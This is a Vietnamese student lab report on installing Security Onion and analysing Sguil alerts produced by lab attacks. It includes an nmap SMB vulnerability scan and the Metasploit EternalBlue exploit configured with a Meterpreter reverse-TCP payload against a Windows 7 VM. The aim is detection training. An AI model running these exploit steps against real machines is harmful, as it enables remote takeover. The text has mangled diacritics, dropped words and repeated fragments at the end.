HỌC VIỆN KỸ THUẬT MẬT Mà KHOA AN TỒN THƠNG TIN ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ BÀI TẬP MƠN QUẢN TRỊ AN TỒN HỆ THỐNG TRIỂN KHAI HỆ THỐNG GIÁM SÁT ATTT SECURITY ONION Giảng viên : Ths Cao Minh Tuấn Sinh viên thực hiện: Lớp : HÀ NỘI, 2021 MỤC LỤC TRIỂN KHAI HỆ THỐNG GIÁM SÁT ATTT SECURITY ONION 1.1 Chuẩn bị - 01 máy người dùng chạy hệ điều hành Windows có kết nối vào LAN - 01 máy ảo chạy hệ điều hành Kali Linux kết nối với LAN Windows để thực xâm nhập mạng - 01 máy chủ cài đặt công cụ Security Onion để giám sát mạng 1.2 Mơ hình triển khai -2- 1.3 Các bước thực Cài đặt công cụ Security Onion - Cài đặt Security Onion - Cấu hình Security Onion Thực cơng phân tích cảnh báo hệ thống giám sát 1.4 Thực 1.4.1 Cài đặt công cụ Security Onion Bấm chọn New Virtual Machine để tạo máy ảo mới, sau thêm file ISO bấm Next để tiếp tục: Chọn hệ điều hành Linux version Ubuntu sau bấm Next để tiếp tục: Đặt tên cho máy ảo mục name chọn đường dẫn mục location: Cài đặt thông số cho máy ảo bấm Close để kết thúc q trình tạo Giao diện xuất hiện, chọn Install để chuyển đến giao diện cài đặt Chọn ngôn ngữ cài đặt English, chọn Next để tiếp tục Thiết lập loại cài đặt, chọn Erase disk and install Security Onion (dọn dẹp ổ đĩa cài đặt Security Onion) Bấm chọn Install Now để cài đặt Giao diện lựa chọn loại bàn phím English (US) : Đặt tên máy mật thích hợp, chọn Require my password to log in để yêu cầu mật lần đăng nhập : Giao diện cài đặt xuất hình sau :quá trình cài đặt vài phút Quá trình cài đặt hồn tất, khỏi cửa sổ cài đặt Bấm chọn Restart Now để khởi động lại lưu lại tồn thơng số q trình cài đặt Q trình cài đặt thành cơng 1.4.2 Cấu hình Security Onion Bấm chọn Set up icon để bắt đầu trình cấu hình : Giao diện cấu sau, xuất công cụ hỗ trợ công cụ Security Onion Bấm Yes tiếp tục Tại bước bỏ qua việc cấu hình mạng cách chọn Yes, skip network configuration Giao diện lựa chọn chế độ, chọn chế độ Production Mode (cấu hình tay thay cấu hình tự động) Bấm chọn New để tạo máy chủ Security Onion : Cài đặt định dạng IP cho HOME_NET (có thể để mặc định) Sau click chọn “OK” Nhập dung lượng khơng gian lưu trữ (GB), tối thiểu 19GB, sau nhấp “OK” 1.4.2 Thực cơng phân tích cảnh báo Khởi động máy Kali Linux máy trạm Win 7, thiết lập địa IP Từ máy attacker Kali thực công metaspolit đến máy victim windows 7, sử dụng công cụ Sguil để thu thập phân tích cảnh báo Đăng nhập tài khoản mật cấu hình vào Sguil giao diện Security Onion Chọn vùng mạng cần giám sát, thiết lập card mạng ens33 Tích chọn Start SGUIL để đến giao diện giám sát Thực ping kiểm tra kêt nối từ máy attacker tới máy win Theo dõi cảnh báo Sguil Quá trình ping thực gói tin đồng thời Sguil hiển thị gói tin đếm gói tin với thời gian thực:  Tại gói ICMP thấy địa IP nguồn 192.168.2.128 địa IP đích 192.168.2.129 hiển thị với Protocol = (ICMP)  Có Event Message GPL luật cảnh báo cũ Snort, phía sau tên đính kèm cảnh báo Khi trỏ tới gói ICMP, Sguil hiển thị vùng hiển thị chi tiết gói tin đó: Tích Show Packet Data Show Rules để xem chi tiết  Phía luật: luật cảnh báo ICMP (alert icmp)  Phía thơng tin IP Header Version = 4, HeaderLength = ,Time to live = 64 hệ điều hành Linux  Tiếp theo thông tin kiểu thông báo ICMP: với code type =8 tức kiểu Echo Request  Phần lại Data 56 byte Thực dò quét cổng máy Attacker tới máy Win nmap Sau xong thấy danh sách cổng mở win Phía bên Sguil thu thập đưa cảnh báo lập tức:  Có cảnh báo ET đưa tương ứng với mối đe dọa từ việc dò quét cổng  Thực với Protocol = = TCP  Phía luật thông tin thu thập Phần Data = None tức gói khơng mang data Tấn công vào cổng 445 phần quét thấy cổng 445 open # nmap –script smb-vuln* -p445 192.168.2.129 Tấn công smb với vulnerable cho số lỗ hổng windows đặc biệt lỗ hổng ms17-010, khai thác lỗ hổng chiếm quyền kiểm sốt máy nạn nhân Cơng cụ Sguil thu thập khả công này: Tương tự có cảnh báo Attacker thực cổng 445, giao thức sử dụng TCP = Thực công metasploit Khởi động metasploits thực tìm kiếm lỗ hổng database metasploits Sử dụng câu lệnh “use exploit/windows/smb/ms17_010_eternalblue” để vào khai thác lỗ hổng Tiến hành cài đặt cho thông số LHOST, RHOST câu lệnh sau: “set LHOST 192.168.2.128”: địa ip máy attacker “set RHOST 192.168.2.129”: địa ip máy victim Lựa chọn sử dụng payload để khai thác: “set payload windows/meterpreter/reverse_tcp Tại máy Kali Linux, ta nhận thông báo mở phiên kết nối tới máy Windows Quay lại Sguil nhận thông tin cống cảnh báo: Chúng ta thấy rõ cơng từ exploit xuất phát từ địa ip nguồn 192.168.2.128 , địa ip đích 192.168.2.129 thơng qua cổng 445 protocol = (TCP) Tại thấy giá trị trường Time to live (TTL=64) ta biết hệ điều hành Linux Sau khai thác thành công, cửa hậu mở ra, máy nạn nhân gửi gói tin ngược trở lại cho attacker thông qua cổng 445 Tại giá trị trường Time to live = 128 ta biết hệ điều hành Windows Ngồi Sguil cịn cho phép liệt kê, phân tích trích xuất luồng Giả sử trích xuất luồng gói tin MSF style cổng 445 giúp việc phân tích xác định hành vi nghi ngờ ... cụ Security Onion để giám sát mạng 1.2 Mô hình triển khai -2- 1.3 Các bước thực Cài đặt công cụ Security Onion - Cài đặt Security Onion - Cấu hình Security Onion Thực cơng phân tích cảnh báo hệ. ..MỤC LỤC TRIỂN KHAI HỆ THỐNG GIÁM SÁT ATTT SECURITY ONION 1.1 Chuẩn bị - 01 máy người dùng chạy hệ điều hành Windows có kết nối vào LAN - 01 máy ảo chạy hệ điều hành Kali Linux kết nối với LAN Windows... phân tích cảnh báo hệ thống giám sát 1.4 Thực 1.4.1 Cài đặt công cụ Security Onion Bấm chọn New Virtual Machine để tạo máy ảo mới, sau thêm file ISO bấm Next để tiếp tục: Chọn hệ điều hành Linux